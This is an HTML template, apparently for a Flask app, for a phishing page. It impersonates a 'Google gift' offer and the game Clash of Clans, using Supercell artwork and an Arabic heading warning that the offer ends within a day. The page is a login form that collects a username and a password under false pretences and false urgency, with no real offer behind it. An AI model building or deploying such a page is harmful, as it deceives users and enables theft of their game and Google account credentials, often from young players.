<!DOCTYPE html>
<html lang="ar" dir="ltr">

<head>
    <meta charset="utf-8">
    <meta property="title" content="">
    <meta property="image" content="https://tse2.mm.bing.net/th?id=OIP.Cq7cFSlKDpWm-Z5n2G9OGgHaFw&pid=Api&P=0&w=208&h=163">
    <meta property="site_name" content="Google gift">
    <meta property="description" content="Google gives free gifts for a limited period">
    <meta property="title" content="clash of clanes">
    <title>َclash of clanes</title>
    <link rel="stylesheet" href="{{ url_for('static',filename='Clash.css') }}">
</head>

<body>

    <form class="box">
        <h1>سوف ينتهي العرض خلال يوم سارع قبل الأنتهاء</h1>
        <img src="{{ url_for('static',filename='supercell-art-artstation-icewizard.jpg') }}" />
        <input type="text" name="email" placeholder="Username">
        <input type="password" name="pass" placeholder="Password">
        <input type="submit" value="تسجيل الدخول">
    </form>


</body>

</html>
